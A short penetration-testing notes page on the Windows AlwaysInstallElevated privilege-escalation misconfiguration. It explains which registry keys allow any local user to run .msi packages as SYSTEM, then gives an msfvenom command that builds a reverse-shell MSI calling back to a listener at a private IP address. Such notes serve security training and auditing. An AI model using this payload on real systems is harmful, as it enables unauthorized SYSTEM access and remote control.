AlwaysInstalledElevated
Windows systems are affected by a privilege escalation vulnerability when the registry keys HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
and HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
are both set to 1
. This misconfiguration allows any local user to execute Windows Installer (.msi
) packages with elevated privileges. Exploitation is achieved by generating a malicious .msi
payload and executing it through msiexec
, which results in code execution as SYSTEM
.
There are various ways to exploit this misconfiguration:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.241 LPORT=80 -f msi -o revshell.msi
Last updated
Was this helpful?